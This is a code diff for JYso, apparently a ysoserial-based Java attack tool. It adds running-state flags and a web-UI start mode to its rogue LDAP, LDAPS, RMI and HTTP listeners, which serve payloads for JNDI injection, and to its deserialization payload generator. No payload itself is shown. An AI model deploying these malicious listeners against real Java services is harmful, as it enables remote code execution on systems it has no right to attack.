+ InMemoryDirectoryServerConfig serverConfig = new InMemoryDirectoryServerConfig("dc=example,dc=com");
+
+ serverConfig.setListenerConfigs(new InMemoryListenerConfig(
+ "listen",
+ InetAddress.getByName("0.0.0.0"),
+ Config.ldapPort,
+ ServerSocketFactory.getDefault(),
+ SocketFactory.getDefault(),
+ (SSLSocketFactory) SSLSocketFactory.getDefault()));
+
+ if (!USER.isEmpty() || !PASSWD.isEmpty()) {
+ serverConfig.addAdditionalBindCredentials(USER, PASSWD);
+ }
+
+ //添加操作拦截器
+ //将提供的操作拦截器添加到操作拦截器列表中,该列表可用于在请求被内存目录服务器处理之前转换请求,和/或在响应返回给客户端之前转换响应。
+ serverConfig.addInMemoryOperationInterceptor(new LdapServer());
+ InMemoryDirectoryServer ds = new InMemoryDirectoryServer(serverConfig);
+ ds.startListening();
+ isRunning = true;
+ System.out.println(ansi().render("@|green [+]|@ LDAP Server Start Listening on >> " + Config.ldapPort + "..."));
+ } catch (Exception e) {
+ log.error("e: ", e);
+ }
+ }
+
+ @Override
+ public void processSearchResult(InMemoryInterceptedSearchResult result) {
+ String base;
+ if (!ROUTE.isEmpty()) {
+ base = ROUTE;
+ } else {
+ base = result.getRequest().getBaseDN();
+ }
+ try {
+ if (!AESkey.equals("123")) {
+ base = base64Decode(base);
+ base = JNDIUtils.decrypt(base, AESkey);
+ }
+ } catch (Exception ignored) {
+
+ }
+
+ //收到ldap请求
+ //System.out.println(ansi().render("@|green [+] Received LDAP Query : |@" + base));
+ LdapController controller = null;
+ //find controller
+ //根据请求的路径从route中匹配相应的controller
+ for (String key : routes.keySet()) {
+ //compare using wildcard at the end
+ if (base.toLowerCase().startsWith(key)) {
+ controller = routes.get(key);
+ break;
+ }
+ }
+
+
+ if (controller == null) {
+ System.out.println(ansi().render("@|red [!] Invalid LDAP Query >> |@" + base));
+ return;
+ }
+
+ try {
+ //从控制器中进行返回
+ controller.process(base);
+ controller.sendResult(result, base);
+ } catch (Exception e1) {
+ System.out.println(ansi().render("@|red [!] Exception >> |@" + e1.getMessage()));
+ }
+ }
}
\ No newline at end of file
diff --git a/src/main/java/com/qi4l/JYso/LdapsServer.java b/src/main/java/com/qi4l/JYso/LdapsServer.java
index eb2c35c..6fa8f0f 100644
--- a/src/main/java/com/qi4l/JYso/LdapsServer.java
+++ b/src/main/java/com/qi4l/JYso/LdapsServer.java
@@ -1,59 +1,61 @@
-package com.qi4l.JYso;
-
-import com.qi4l.JYso.gadgets.Config.Config;
-import com.unboundid.ldap.listener.InMemoryDirectoryServer;
-import com.unboundid.ldap.listener.InMemoryDirectoryServerConfig;
-import com.unboundid.ldap.listener.InMemoryListenerConfig;
-import com.unboundid.util.ssl.KeyStoreKeyManager;
-import com.unboundid.util.ssl.SSLUtil;
-import com.unboundid.util.ssl.TrustAllTrustManager;
-import org.apache.logging.log4j.Logger;
-import org.apache.logging.log4j.LogManager;
-
-import static org.fusesource.jansi.Ansi.ansi;
-
-public class LdapsServer {
- private static final Logger log = LogManager.getLogger(LdapsServer.class);
- private final String certFile;
- private final String keyPass;
-
- public LdapsServer(String certFile, String keyPass) {
- this.certFile = certFile;
- this.keyPass = keyPass;
- }
-
- public static void start() {
- System.out.println(ansi().render("@|green [+]|@ LDAPS Server Start Listening on >> " + Config.ldapsPort + "..."));
- new LdapsServer(Config.certFile, Config.keyPass).run();
- }
-
- public void run() {
- // 设置JDK信任证书
- System.setProperty("javax.net.ssl.trustStore", certFile);
- System.setProperty("javax.net.ssl.trustStorePassword", keyPass);
-
- try {
- SSLUtil serverSSLUtil = new SSLUtil(
- new KeyStoreKeyManager(certFile, keyPass.toCharArray()),
- new TrustAllTrustManager()
- );
- SSLUtil clientSSLUtil = new SSLUtil(new TrustAllTrustManager());
-
- InMemoryDirectoryServerConfig config = new InMemoryDirectoryServerConfig("dc=example,dc=com");
- config.setListenerConfigs(InMemoryListenerConfig.createLDAPSConfig(
- "listen-ldaps",
- null,
- Integer.parseInt(String.valueOf(Config.ldapsPort)),
- serverSSLUtil.createSSLServerSocketFactory(),
- clientSSLUtil.createSSLSocketFactory()
- ));
- config.addInMemoryOperationInterceptor(new LdapServer());
-
- InMemoryDirectoryServer ds = new InMemoryDirectoryServer(config);
- ds.startListening();
- System.out.println(ansi().render("@|green [+]|@ LDAPS Server Start Listening on >> " + Config.ldapsPort + "..."));
- } catch (Exception e) {
- log.error("e: ", e);
- }
- }
+package com.qi4l.JYso;
+
+import com.qi4l.JYso.gadgets.Config.Config;
+import com.unboundid.ldap.listener.InMemoryDirectoryServer;
+import com.unboundid.ldap.listener.InMemoryDirectoryServerConfig;
+import com.unboundid.ldap.listener.InMemoryListenerConfig;
+import com.unboundid.util.ssl.KeyStoreKeyManager;
+import com.unboundid.util.ssl.SSLUtil;
+import com.unboundid.util.ssl.TrustAllTrustManager;
+import org.apache.logging.log4j.Logger;
+import org.apache.logging.log4j.LogManager;
+
+import static org.fusesource.jansi.Ansi.ansi;
+
+public class LdapsServer {
+ private static final Logger log = LogManager.getLogger(LdapsServer.class);
+ public static boolean isRunning = false;
+ private final String certFile;
+ private final String keyPass;
+
+ public LdapsServer(String certFile, String keyPass) {
+ this.certFile = certFile;
+ this.keyPass = keyPass;
+ }
+
+ public static void start() {
+ System.out.println(ansi().render("@|green [+]|@ LDAPS Server Start Listening on >> " + Config.ldapsPort + "..."));
+ new LdapsServer(Config.certFile, Config.keyPass).run();
+ }
+
+ public void run() {
+ // 设置JDK信任证书
+ System.setProperty("javax.net.ssl.trustStore", certFile);
+ System.setProperty("javax.net.ssl.trustStorePassword", keyPass);
+
+ try {
+ SSLUtil serverSSLUtil = new SSLUtil(
+ new KeyStoreKeyManager(certFile, keyPass.toCharArray()),
+ new TrustAllTrustManager()
+ );
+ SSLUtil clientSSLUtil = new SSLUtil(new TrustAllTrustManager());
+
+ InMemoryDirectoryServerConfig config = new InMemoryDirectoryServerConfig("dc=example,dc=com");
+ config.setListenerConfigs(InMemoryListenerConfig.createLDAPSConfig(
+ "listen-ldaps",
+ null,
+ Integer.parseInt(String.valueOf(Config.ldapsPort)),
+ serverSSLUtil.createSSLServerSocketFactory(),
+ clientSSLUtil.createSSLSocketFactory()
+ ));
+ config.addInMemoryOperationInterceptor(new LdapServer());
+
+ InMemoryDirectoryServer ds = new InMemoryDirectoryServer(config);
+ ds.startListening();
+ isRunning = true;
+ System.out.println(ansi().render("@|green [+]|@ LDAPS Server Start Listening on >> " + Config.ldapsPort + "..."));
+ } catch (Exception e) {
+ log.error("e: ", e);
+ }
+ }
}
\ No newline at end of file
diff --git a/src/main/java/com/qi4l/JYso/RMIServer.java b/src/main/java/com/qi4l/JYso/RMIServer.java
index 737e288..28d8e39 100644
--- a/src/main/java/com/qi4l/JYso/RMIServer.java
+++ b/src/main/java/com/qi4l/JYso/RMIServer.java
@@ -49,6 +49,8 @@ import static org.fusesource.jansi.Ansi.ansi;
@SuppressWarnings("restriction")
public class RMIServer implements Runnable {
+ public static boolean isRunning = false;
+
private final ServerSocket ss;
private final Object waitLock = new Object();
private final URL classpathUrl;
@@ -66,6 +68,7 @@ public class RMIServer implements Runnable {
try {
System.out.println(ansi().render("@|green [+]|@ RMI Server Start Listening on >> " + rmiPort + "..."));
RMIServer c = new RMIServer(rmiPort, new URL(url));
+ isRunning = true;
c.run();
} catch (Exception e) {
System.err.println("Listener error");
diff --git a/src/main/java/com/qi4l/JYso/Starter.java b/src/main/java/com/qi4l/JYso/Starter.java
index 09a186f..a3f8a76 100644
--- a/src/main/java/com/qi4l/JYso/Starter.java
+++ b/src/main/java/com/qi4l/JYso/Starter.java
@@ -1,41 +1,44 @@
-package com.qi4l.JYso;
-
-import com.qi4l.JYso.gadgets.Config.ysoserial;
-import com.qi4l.JYso.gadgets.Config.Config;
-import com.qi4l.JYso.gadgets.ObjectPayload;
-import org.apache.commons.collections4.map.CaseInsensitiveMap;
-
-import static com.qi4l.JYso.gadgets.Config.Config.logo;
-
-public class Starter {
-
- // 用于存储所有的ObjectPayload类
- public static CaseInsensitiveMap>> caseInsensitiveObjectPayloadMap = new CaseInsensitiveMap<>();
- public static boolean JYsoMode = false;
-
- static {
- for (Class extends ObjectPayload>> clazz : ObjectPayload.Utils.getPayloadClasses()) {
- caseInsensitiveObjectPayloadMap.put(clazz.getName(), clazz);
- }
- }
-
- public static void main(String[] args) throws Exception {
- // 如果参数中包含-j,则启动LDAP、HTTP、RMI服务
- if (args.length > 0 && args[0].equals("-j")) {
- logo();
- Config.applyCmdArgs(args);
- LdapServer.start();
- HTTPServer.start();
- if (Config.TLSProxy) {
- LdapsServer.start();
- }
- RMIServer.start();
- }
-
- // 如果参数中包含-y,则启动 ysoserial
- if (args.length > 0 && args[0].equals("-y")) {
- JYsoMode = true;
- ysoserial.run(args);
- }
- }
-}
+package com.qi4l.JYso;
+
+import com.qi4l.JYso.gadgets.Config.ysoserial;
+import com.qi4l.JYso.gadgets.Config.Config;
+import com.qi4l.JYso.gadgets.ObjectPayload;
+import com.qi4l.JYso.web.JYsoWebApplication;
+import org.apache.commons.collections4.map.CaseInsensitiveMap;
+
+import static com.qi4l.JYso.gadgets.Config.Config.logo;
+
+public class Starter {
+
+ public static CaseInsensitiveMap>> caseInsensitiveObjectPayloadMap = new CaseInsensitiveMap<>();
+ public static boolean JYsoMode = false;
+
+ static {
+ for (Class extends ObjectPayload>> clazz : ObjectPayload.Utils.getPayloadClasses()) {
+ caseInsensitiveObjectPayloadMap.put(clazz.getName(), clazz);
+ }
+ }
+
+ public static void main(String[] args) throws Exception {
+ if (args.length == 0 || args[0].equals("-w")) {
+ JYsoWebApplication.start(args);
+ return;
+ }
+
+ if (args[0].equals("-j")) {
+ logo();
+ Config.applyCmdArgs(args);
+ LdapServer.start();
+ HTTPServer.start();
+ if (Config.TLSProxy) {
+ LdapsServer.start();
+ }
+ RMIServer.start();
+ }
+
+ if (args[0].equals("-y")) {
+ JYsoMode = true;
+ ysoserial.run(args);
+ }
+ }
+}
diff --git a/src/main/java/com/qi4l/JYso/gadgets/Config/ysoserial.java b/src/main/java/com/qi4l/JYso/gadgets/Config/ysoserial.java
index b342c44..6230164 100644
--- a/src/main/java/com/qi4l/JYso/gadgets/Config/ysoserial.java
+++ b/src/main/java/com/qi4l/JYso/gadgets/Config/ysoserial.java
@@ -126,9 +126,7 @@ public class ysoserial {
} catch (Throwable e) {
System.err.println("Error while generating or serializing payload");
log.error(String.valueOf(e));
- System.exit(1);
}
- System.exit(0);
}
public static Options getOptions() {